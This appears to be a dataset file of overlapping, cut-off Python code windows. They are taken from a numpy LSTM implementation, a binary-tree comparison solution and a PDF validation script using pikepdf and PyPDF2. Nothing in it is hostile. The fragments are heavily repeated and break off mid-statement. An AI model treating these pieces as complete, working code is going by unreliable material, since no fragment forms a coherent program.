cache0[l]['c0'] is not None and cache0[l]['h0'] is", "in_ = input.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1]) outputs", "np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dH = dOut.copy() if dCache is", "+ self.shape[1] + 1]) raws = np.zeros([time_steps, batch, self.shape[1]]) outputs = np.zeros([time_steps, batch,", "def __call__(self, input): return np.tanh(input) def d(self, input): return 1 - input *", "def __call__(self, input_tensor): out, _ = self.eval_for_back_prop(input_tensor) return out def eval_for_back_prop(self, input_tensor): time_steps,", "* self.num_of_layers() out = inputs for l in range(0, self.num_of_layers()): if cache0 is", "at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf ''' shape = None weights = None previous = None cell", "dInput[t] = dAct[t].dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh = dH[t - 1]", "in self.layers: out = l(out) return out def init(self): for l in self.layers:", "input, train_on): return -np.log(input[range(train_on.size), train_on]) def d(self, probs, train_on=None): ''' it computes the" ]
[ "root node of tree # @return an integer def isSameTree(self, A, B): if", "__name__ == \"__main__\": root1, root1.left, root1.right = TreeNode(1), TreeNode(2), TreeNode(3) root2, root2.left, root2.right", "root1.right = TreeNode(1), TreeNode(2), TreeNode(3) root2, root2.left, root2.right = TreeNode(1), TreeNode(2), TreeNode(3) print", "A is not None and B is not None: if A.val == B.val", "is None: return True if A is not None and B is not", "= None class Solution: # @param A : root node of tree #", "if A is not None and B is not None: if A.val ==", "= TreeNode(1), TreeNode(2), TreeNode(3) root2, root2.left, root2.right = TreeNode(1), TreeNode(2), TreeNode(3) print Solution().isSameTree(root1,", "TreeNode: def __init__(self, x): self.val = x self.left = None self.right = None", "node class TreeNode: def __init__(self, x): self.val = x self.left = None self.right", "node of tree # @return an integer def isSameTree(self, A, B): if A", ": root node of tree # @param B : root node of tree", "@return an integer def isSameTree(self, A, B): if A is None and B", "B.val and self.isSameTree(A.left, B.left) and self.isSameTree(A.right, B.right): return 1 return 0 if __name__", "self.val = x self.left = None self.right = None class Solution: # @param", "@param B : root node of tree # @return an integer def isSameTree(self,", "@param A : root node of tree # @param B : root node", "integer def isSameTree(self, A, B): if A is None and B is None:", "None and B is None: return True if A is not None and", "is not None: if A.val == B.val and self.isSameTree(A.left, B.left) and self.isSameTree(A.right, B.right):", "and self.isSameTree(A.left, B.left) and self.isSameTree(A.right, B.right): return 1 return 0 if __name__ ==", "binary tree node class TreeNode: def __init__(self, x): self.val = x self.left =", "tree # @param B : root node of tree # @return an integer", "class TreeNode: def __init__(self, x): self.val = x self.left = None self.right =", "None: if A.val == B.val and self.isSameTree(A.left, B.left) and self.isSameTree(A.right, B.right): return 1", "__init__(self, x): self.val = x self.left = None self.right = None class Solution:", "# @param A : root node of tree # @param B : root", "self.isSameTree(A.right, B.right): return 1 return 0 if __name__ == \"__main__\": root1, root1.left, root1.right", "tree # @return an integer def isSameTree(self, A, B): if A is None", "x self.left = None self.right = None class Solution: # @param A :", "Definition for a binary tree node class TreeNode: def __init__(self, x): self.val =", "class Solution: # @param A : root node of tree # @param B", "of tree # @param B : root node of tree # @return an", "== \"__main__\": root1, root1.left, root1.right = TreeNode(1), TreeNode(2), TreeNode(3) root2, root2.left, root2.right =", "a binary tree node class TreeNode: def __init__(self, x): self.val = x self.left", "def __init__(self, x): self.val = x self.left = None self.right = None class", "root1, root1.left, root1.right = TreeNode(1), TreeNode(2), TreeNode(3) root2, root2.left, root2.right = TreeNode(1), TreeNode(2),", "def isSameTree(self, A, B): if A is None and B is None: return", "node of tree # @param B : root node of tree # @return", "not None and B is not None: if A.val == B.val and self.isSameTree(A.left,", "self.isSameTree(A.left, B.left) and self.isSameTree(A.right, B.right): return 1 return 0 if __name__ == \"__main__\":", "A.val == B.val and self.isSameTree(A.left, B.left) and self.isSameTree(A.right, B.right): return 1 return 0", "and self.isSameTree(A.right, B.right): return 1 return 0 if __name__ == \"__main__\": root1, root1.left,", "= None self.right = None class Solution: # @param A : root node", "= x self.left = None self.right = None class Solution: # @param A", "root1.left, root1.right = TreeNode(1), TreeNode(2), TreeNode(3) root2, root2.left, root2.right = TreeNode(1), TreeNode(2), TreeNode(3)", "TreeNode(1), TreeNode(2), TreeNode(3) root2, root2.left, root2.right = TreeNode(1), TreeNode(2), TreeNode(3) print Solution().isSameTree(root1, root2)", "return 1 return 0 if __name__ == \"__main__\": root1, root1.left, root1.right = TreeNode(1),", "root2, root2.left, root2.right = TreeNode(1), TreeNode(2), TreeNode(3) print Solution().isSameTree(root1, root2) # Output 1", "1 return 0 if __name__ == \"__main__\": root1, root1.left, root1.right = TreeNode(1), TreeNode(2),", "B : root node of tree # @return an integer def isSameTree(self, A,", "B.right): return 1 return 0 if __name__ == \"__main__\": root1, root1.left, root1.right =", "is not None and B is not None: if A.val == B.val and", "return True if A is not None and B is not None: if", "== B.val and self.isSameTree(A.left, B.left) and self.isSameTree(A.right, B.right): return 1 return 0 if", "# Definition for a binary tree node class TreeNode: def __init__(self, x): self.val", "None: return True if A is not None and B is not None:", "is None and B is None: return True if A is not None", "\"__main__\": root1, root1.left, root1.right = TreeNode(1), TreeNode(2), TreeNode(3) root2, root2.left, root2.right = TreeNode(1),", "Solution: # @param A : root node of tree # @param B :", "isSameTree(self, A, B): if A is None and B is None: return True", "B): if A is None and B is None: return True if A", "return 0 if __name__ == \"__main__\": root1, root1.left, root1.right = TreeNode(1), TreeNode(2), TreeNode(3)", "A : root node of tree # @param B : root node of", "if __name__ == \"__main__\": root1, root1.left, root1.right = TreeNode(1), TreeNode(2), TreeNode(3) root2, root2.left,", "TreeNode(3) root2, root2.left, root2.right = TreeNode(1), TreeNode(2), TreeNode(3) print Solution().isSameTree(root1, root2) # Output", "None self.right = None class Solution: # @param A : root node of", "self.right = None class Solution: # @param A : root node of tree", "# @param B : root node of tree # @return an integer def", "self.left = None self.right = None class Solution: # @param A : root", "A is None and B is None: return True if A is not", "and B is not None: if A.val == B.val and self.isSameTree(A.left, B.left) and", "tree node class TreeNode: def __init__(self, x): self.val = x self.left = None", "TreeNode(2), TreeNode(3) root2, root2.left, root2.right = TreeNode(1), TreeNode(2), TreeNode(3) print Solution().isSameTree(root1, root2) #", "for a binary tree node class TreeNode: def __init__(self, x): self.val = x", ": root node of tree # @return an integer def isSameTree(self, A, B):", "x): self.val = x self.left = None self.right = None class Solution: #", "None class Solution: # @param A : root node of tree # @param", "B.left) and self.isSameTree(A.right, B.right): return 1 return 0 if __name__ == \"__main__\": root1,", "None and B is not None: if A.val == B.val and self.isSameTree(A.left, B.left)", "True if A is not None and B is not None: if A.val", "if A is None and B is None: return True if A is", "B is None: return True if A is not None and B is", "not None: if A.val == B.val and self.isSameTree(A.left, B.left) and self.isSameTree(A.right, B.right): return", "root node of tree # @param B : root node of tree #", "and B is None: return True if A is not None and B", "A, B): if A is None and B is None: return True if", "0 if __name__ == \"__main__\": root1, root1.left, root1.right = TreeNode(1), TreeNode(2), TreeNode(3) root2,", "B is not None: if A.val == B.val and self.isSameTree(A.left, B.left) and self.isSameTree(A.right,", "if A.val == B.val and self.isSameTree(A.left, B.left) and self.isSameTree(A.right, B.right): return 1 return", "# @return an integer def isSameTree(self, A, B): if A is None and", "an integer def isSameTree(self, A, B): if A is None and B is", "of tree # @return an integer def isSameTree(self, A, B): if A is" ]
[]
[ "10:00:02 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection: close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection: 1; mode=block\\r\\nSet-Cookie:", "Exception as e: isOK[0] = 'NO' else: isOK[0] = 'YES' try: with open(filePath,", "__name__ == '__main__': # downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') # #header = b'HTTP/1.1 200 OK\\r\\nDate: Sun, 28", "\"k\" #print(meta.pdfa_status) except Exception as e: isOK[0] = 'NO' else: isOK[0] = 'YES'", "# if \"pdf\" not in output: # return False # except Exception as", "# # dlReports = [info] def validatePDF(filePath): #print('validatePDF: ', filePath) return magic.from_file(filePath, mime=True)", "return [isOK, checkData] def validatePDF_test1(fileName): isOK = ['', ''] checkData = [] filePath", "print(getURLsFromExcelFile(excelFileList[0])) # info = downloadFile( # \"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") # # dlReports = [info] def", "#if pdfFile.pages <= 0: # raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK", "= magic.from_file(filePath, mime=True).lower() # if \"pdf\" not in output: # return False #", "#checkData = pdfFile.check() checkData.append(len(pdfFile.pages)) #checkData = [check, meta, status] #print(pdfFile.pages) if len(pdfFile.pages) <=", "0: raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK[0] = 'NO' else: isOK[0]", "else: # return True def validatePDF_test2(fileName): isOK = \"\" checkData = [] filePath", "raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK = \"False\" else: isOK =", "# dlReports = [info] def validatePDF(filePath): #print('validatePDF: ', filePath) return magic.from_file(filePath, mime=True) #", "pdfFile.open_metadata() #status = meta.pdfa_status #checkData = pdfFile.check() checkData.append(len(pdfFile.pages)) #checkData = [check, meta, status]", "application/pdf\\r\\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection: 1; mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly; Secure\\r\\n\\r\\n' # #print(header.decode('iso-8859-1'))", "isOK[0] = 'NO' else: isOK[0] = 'YES' try: with open(filePath, 'rb') as pdfFileObj:", "# downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') # #header = b'HTTP/1.1 200 OK\\r\\nDate: Sun, 28 Nov 2021 12:45:04", "if __name__ == '__main__': # downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') # #header = b'HTTP/1.1 200 OK\\r\\nDate: Sun,", "magic.from_file(filePath, mime=True).lower() # if \"pdf\" not in output: # return False # except", "fileName) try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool']) #checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages)) #print(pdfFile.pages)", "[] filePath = os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #status", "isOK[0], isOK[1])) #print('%s %s' % (isOK[0], isOK[1])) return [isOK, checkData] # if __name__", "200 OK\\r\\nDate: Sun, 28 Nov 2021 12:45:04 GMT\\r\\nServer: Apache\\r\\nLast-Modified: Mon, 08 Jan 2018", "0: # raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK = \"False\" else:", "else: isOK[1] = 'YES' #print('%s:\\n %s %s' % (fileName, isOK[0], isOK[1])) #print('%s %s'", "e: isOK = \"False\" else: isOK = \"True\" return [isOK, checkData] def validatePDF_test1(fileName):", "Apache\\r\\nLast-Modified: Mon, 08 Jan 2018 10:00:02 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection: close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security: max-age=31536000;", "getExcelFiles() # print(getURLsFromExcelFile(excelFileList[0])) # info = downloadFile( # \"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") # # dlReports =", "Exception as e: # return False # else: # return True def validatePDF_test2(fileName):", "in output: # return False # except Exception as e: # return False", "= 'YES' #print('%s:\\n %s %s' % (fileName, isOK[0], isOK[1])) #print('%s %s' % (isOK[0],", "# return True def validatePDF_test2(fileName): isOK = \"\" checkData = [] filePath =", "return magic.from_file(filePath, mime=True) # try: # output = magic.from_file(filePath, mime=True).lower() # if \"pdf\"", "os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool']) #checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages))", "\"False\" else: isOK = \"True\" return [isOK, checkData] def validatePDF_test1(fileName): isOK = ['',", "validatePDF_test1(fileName): isOK = ['', ''] checkData = [] filePath = os.path.join(downloadDir, fileName) try:", "= pdfFile.open_metadata() #checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool']) #checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages)) #print(pdfFile.pages) #if pdfFile.pages <= 0: # raise", "isOK[1])) #print('%s %s' % (isOK[0], isOK[1])) return [isOK, checkData] # if __name__ ==", "== '__main__': # downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') # #header = b'HTTP/1.1 200 OK\\r\\nDate: Sun, 28 Nov", "= [] filePath = os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata()", "#checkData = [check, meta, status] #print(pdfFile.pages) if len(pdfFile.pages) <= 0: raise \"k\" #print(meta.pdfa_status)", "preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection: 1; mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly; Secure\\r\\n\\r\\n' # #print(header.decode('iso-8859-1')) # for name,", "# return False # except Exception as e: # return False # else:", "Nov 2021 12:45:04 GMT\\r\\nServer: Apache\\r\\nLast-Modified: Mon, 08 Jan 2018 10:00:02 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options:", "e: isOK[0] = 'NO' else: isOK[0] = 'YES' try: with open(filePath, 'rb') as", "PyPDF2.PdfFileReader(pdfFileObj) if pdfReader.numPages <= 0: raise \"k\" except Exception as e: isOK[1] =", "mime=True).lower() # if \"pdf\" not in output: # return False # except Exception", "0: raise \"k\" except Exception as e: isOK[1] = 'NO' else: isOK[1] =", "validatePDF_test2(fileName): isOK = \"\" checkData = [] filePath = os.path.join(downloadDir, fileName) try: pdfFile", "filePath = os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #status =", "'NO' else: isOK[1] = 'YES' #print('%s:\\n %s %s' % (fileName, isOK[0], isOK[1])) #print('%s", "(fileName, isOK[0], isOK[1])) #print('%s %s' % (isOK[0], isOK[1])) return [isOK, checkData] # if", "Jan 2018 10:00:02 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection: close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection:", "GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection: close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection: 1; mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni;", "try: # output = magic.from_file(filePath, mime=True).lower() # if \"pdf\" not in output: #", "= pikepdf.open(filePath) #meta = pdfFile.open_metadata() #checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool']) #checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages)) #print(pdfFile.pages) #if pdfFile.pages <=", "# output = magic.from_file(filePath, mime=True).lower() # if \"pdf\" not in output: # return", "return [isOK, checkData] # if __name__ == '__main__': # downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') # #header =", "#print(header.decode('iso-8859-1')) # for name, value in headers.items(): # print('%s: %s' % (name, value))", "meta.pdfa_status #checkData = pdfFile.check() checkData.append(len(pdfFile.pages)) #checkData = [check, meta, status] #print(pdfFile.pages) if len(pdfFile.pages)", "= pdfFile.open_metadata() #status = meta.pdfa_status #checkData = pdfFile.check() checkData.append(len(pdfFile.pages)) #checkData = [check, meta,", "isOK[1])) return [isOK, checkData] # if __name__ == '__main__': # downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') # #header", "1; mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly; Secure\\r\\n\\r\\n' # #print(header.decode('iso-8859-1')) # for name, value in", "''] checkData = [] filePath = os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta", "not in output: # return False # except Exception as e: # return", "[check, meta, status] #print(pdfFile.pages) if len(pdfFile.pages) <= 0: raise \"k\" #print(meta.pdfa_status) except Exception", "#print('validatePDF: ', filePath) return magic.from_file(filePath, mime=True) # try: # output = magic.from_file(filePath, mime=True).lower()", "Sun, 28 Nov 2021 12:45:04 GMT\\r\\nServer: Apache\\r\\nLast-Modified: Mon, 08 Jan 2018 10:00:02 GMT\\r\\nAccept-Ranges:", "# excelFileList = getExcelFiles() # print(getURLsFromExcelFile(excelFileList[0])) # info = downloadFile( # \"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") #", "isOK[0] = 'YES' try: with open(filePath, 'rb') as pdfFileObj: pdfReader = PyPDF2.PdfFileReader(pdfFileObj) if", "= ['', ''] checkData = [] filePath = os.path.join(downloadDir, fileName) try: pdfFile =", "magic.from_file(filePath, mime=True) # try: # output = magic.from_file(filePath, mime=True).lower() # if \"pdf\" not", "= \"True\" return [isOK, checkData] def validatePDF_test1(fileName): isOK = ['', ''] checkData =", "False # except Exception as e: # return False # else: # return", "as e: isOK = \"False\" else: isOK = \"True\" return [isOK, checkData] def", "except Exception as e: isOK[1] = 'NO' else: isOK[1] = 'YES' #print('%s:\\n %s", "'__main__': # downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') # #header = b'HTTP/1.1 200 OK\\r\\nDate: Sun, 28 Nov 2021", "def validatePDF(filePath): #print('validatePDF: ', filePath) return magic.from_file(filePath, mime=True) # try: # output =", "# if __name__ == '__main__': # downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') # #header = b'HTTP/1.1 200 OK\\r\\nDate:", "nosniff\\r\\nConnection: close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection: 1; mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly; Secure\\r\\n\\r\\n'", "pdfFileObj: pdfReader = PyPDF2.PdfFileReader(pdfFileObj) if pdfReader.numPages <= 0: raise \"k\" except Exception as", "pikepdf import PyPDF2 # excelFileList = getExcelFiles() # print(getURLsFromExcelFile(excelFileList[0])) # info = downloadFile(", "isOK[1] = 'YES' #print('%s:\\n %s %s' % (fileName, isOK[0], isOK[1])) #print('%s %s' %", "close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection: 1; mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly; Secure\\r\\n\\r\\n' #", "%s' % (fileName, isOK[0], isOK[1])) #print('%s %s' % (isOK[0], isOK[1])) return [isOK, checkData]", "except Exception as e: isOK[0] = 'NO' else: isOK[0] = 'YES' try: with", "pikepdf.open(filePath) #meta = pdfFile.open_metadata() #checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool']) #checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages)) #print(pdfFile.pages) #if pdfFile.pages <= 0:", "False # else: # return True def validatePDF_test2(fileName): isOK = \"\" checkData =", "isOK = \"False\" else: isOK = \"True\" return [isOK, checkData] def validatePDF_test1(fileName): isOK", "downloadFile( # \"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") # # dlReports = [info] def validatePDF(filePath): #print('validatePDF: ', filePath)", "try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #status = meta.pdfa_status #checkData = pdfFile.check()", "%s' % (isOK[0], isOK[1])) return [isOK, checkData] # if __name__ == '__main__': #", "= pikepdf.open(filePath) #meta = pdfFile.open_metadata() #status = meta.pdfa_status #checkData = pdfFile.check() checkData.append(len(pdfFile.pages)) #checkData", "pdfReader = PyPDF2.PdfFileReader(pdfFileObj) if pdfReader.numPages <= 0: raise \"k\" except Exception as e:", "% (fileName, isOK[0], isOK[1])) #print('%s %s' % (isOK[0], isOK[1])) return [isOK, checkData] #", "= 'NO' else: isOK[1] = 'YES' #print('%s:\\n %s %s' % (fileName, isOK[0], isOK[1]))", "#header = b'HTTP/1.1 200 OK\\r\\nDate: Sun, 28 Nov 2021 12:45:04 GMT\\r\\nServer: Apache\\r\\nLast-Modified: Mon,", "#checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages)) #print(pdfFile.pages) #if pdfFile.pages <= 0: # raise \"k\" #print(meta.pdfa_status) except Exception", "12:45:04 GMT\\r\\nServer: Apache\\r\\nLast-Modified: Mon, 08 Jan 2018 10:00:02 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection: close\\r\\nContent-Type:", "pdfFile.pages <= 0: # raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK =", "\"True\" return [isOK, checkData] def validatePDF_test1(fileName): isOK = ['', ''] checkData = []", "e: # return False # else: # return True def validatePDF_test2(fileName): isOK =", "<= 0: raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK[0] = 'NO' else:", "= \"False\" else: isOK = \"True\" return [isOK, checkData] def validatePDF_test1(fileName): isOK =", "filePath) return magic.from_file(filePath, mime=True) # try: # output = magic.from_file(filePath, mime=True).lower() # if", "[isOK, checkData] def validatePDF_test1(fileName): isOK = ['', ''] checkData = [] filePath =", "OK\\r\\nDate: Sun, 28 Nov 2021 12:45:04 GMT\\r\\nServer: Apache\\r\\nLast-Modified: Mon, 08 Jan 2018 10:00:02", "GMT\\r\\nServer: Apache\\r\\nLast-Modified: Mon, 08 Jan 2018 10:00:02 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection: close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security:", "return False # except Exception as e: # return False # else: #", "max-age=31536000; includeSubDomains; preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection: 1; mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly; Secure\\r\\n\\r\\n' # #print(header.decode('iso-8859-1')) #", "\"\" checkData = [] filePath = os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta", "info = downloadFile( # \"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") # # dlReports = [info] def validatePDF(filePath): #print('validatePDF:", "[info] def validatePDF(filePath): #print('validatePDF: ', filePath) return magic.from_file(filePath, mime=True) # try: # output", "isOK[1] = 'NO' else: isOK[1] = 'YES' #print('%s:\\n %s %s' % (fileName, isOK[0],", "2018 10:00:02 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection: close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection: 1;", "# try: # output = magic.from_file(filePath, mime=True).lower() # if \"pdf\" not in output:", "\"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") # # dlReports = [info] def validatePDF(filePath): #print('validatePDF: ', filePath) return magic.from_file(filePath,", "Exception as e: isOK[1] = 'NO' else: isOK[1] = 'YES' #print('%s:\\n %s %s'", "as e: isOK[1] = 'NO' else: isOK[1] = 'YES' #print('%s:\\n %s %s' %", "validatePDF(filePath): #print('validatePDF: ', filePath) return magic.from_file(filePath, mime=True) # try: # output = magic.from_file(filePath,", "#checkData.append(meta['xmp:CreatorTool']) #checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages)) #print(pdfFile.pages) #if pdfFile.pages <= 0: # raise \"k\" #print(meta.pdfa_status) except", "except Exception as e: isOK = \"False\" else: isOK = \"True\" return [isOK,", "except Exception as e: # return False # else: # return True def", "# \"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") # # dlReports = [info] def validatePDF(filePath): #print('validatePDF: ', filePath) return", "isOK = \"\" checkData = [] filePath = os.path.join(downloadDir, fileName) try: pdfFile =", "with open(filePath, 'rb') as pdfFileObj: pdfReader = PyPDF2.PdfFileReader(pdfFileObj) if pdfReader.numPages <= 0: raise", "e: isOK[1] = 'NO' else: isOK[1] = 'YES' #print('%s:\\n %s %s' % (fileName,", "08 Jan 2018 10:00:02 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection: close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload;\\r\\nX-Frame-Options:", "<= 0: # raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK = \"False\"", "pdfFile.check() checkData.append(len(pdfFile.pages)) #checkData = [check, meta, status] #print(pdfFile.pages) if len(pdfFile.pages) <= 0: raise", "'rb') as pdfFileObj: pdfReader = PyPDF2.PdfFileReader(pdfFileObj) if pdfReader.numPages <= 0: raise \"k\" except", "raise \"k\" except Exception as e: isOK[1] = 'NO' else: isOK[1] = 'YES'", "as e: isOK[0] = 'NO' else: isOK[0] = 'YES' try: with open(filePath, 'rb')", "# info = downloadFile( # \"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") # # dlReports = [info] def validatePDF(filePath):", "Mon, 08 Jan 2018 10:00:02 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection: close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security: max-age=31536000; includeSubDomains;", "output: # return False # except Exception as e: # return False #", "= b'HTTP/1.1 200 OK\\r\\nDate: Sun, 28 Nov 2021 12:45:04 GMT\\r\\nServer: Apache\\r\\nLast-Modified: Mon, 08", "# return False # else: # return True def validatePDF_test2(fileName): isOK = \"\"", "#status = meta.pdfa_status #checkData = pdfFile.check() checkData.append(len(pdfFile.pages)) #checkData = [check, meta, status] #print(pdfFile.pages)", "b'HTTP/1.1 200 OK\\r\\nDate: Sun, 28 Nov 2021 12:45:04 GMT\\r\\nServer: Apache\\r\\nLast-Modified: Mon, 08 Jan", "def validatePDF_test2(fileName): isOK = \"\" checkData = [] filePath = os.path.join(downloadDir, fileName) try:", "as e: # return False # else: # return True def validatePDF_test2(fileName): isOK", "= os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool']) #checkData.append(pdfFile.check())", "= meta.pdfa_status #checkData = pdfFile.check() checkData.append(len(pdfFile.pages)) #checkData = [check, meta, status] #print(pdfFile.pages) if", "# raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK = \"False\" else: isOK", "Exception as e: isOK = \"False\" else: isOK = \"True\" return [isOK, checkData]", "filePath = os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool'])", "mime=True) # try: # output = magic.from_file(filePath, mime=True).lower() # if \"pdf\" not in", "import pikepdf import PyPDF2 # excelFileList = getExcelFiles() # print(getURLsFromExcelFile(excelFileList[0])) # info =", "% (isOK[0], isOK[1])) return [isOK, checkData] # if __name__ == '__main__': # downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf')", "[isOK, checkData] # if __name__ == '__main__': # downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') # #header = b'HTTP/1.1", "downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') # #header = b'HTTP/1.1 200 OK\\r\\nDate: Sun, 28 Nov 2021 12:45:04 GMT\\r\\nServer:", "path=/; HttpOnly; Secure\\r\\n\\r\\n' # #print(header.decode('iso-8859-1')) # for name, value in headers.items(): # print('%s:", "return False # else: # return True def validatePDF_test2(fileName): isOK = \"\" checkData", "PyPDF2 # excelFileList = getExcelFiles() # print(getURLsFromExcelFile(excelFileList[0])) # info = downloadFile( # \"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\")", "checkData.append(len(pdfFile.pages)) #checkData = [check, meta, status] #print(pdfFile.pages) if len(pdfFile.pages) <= 0: raise \"k\"", "= [info] def validatePDF(filePath): #print('validatePDF: ', filePath) return magic.from_file(filePath, mime=True) # try: #", "True def validatePDF_test2(fileName): isOK = \"\" checkData = [] filePath = os.path.join(downloadDir, fileName)", "else: 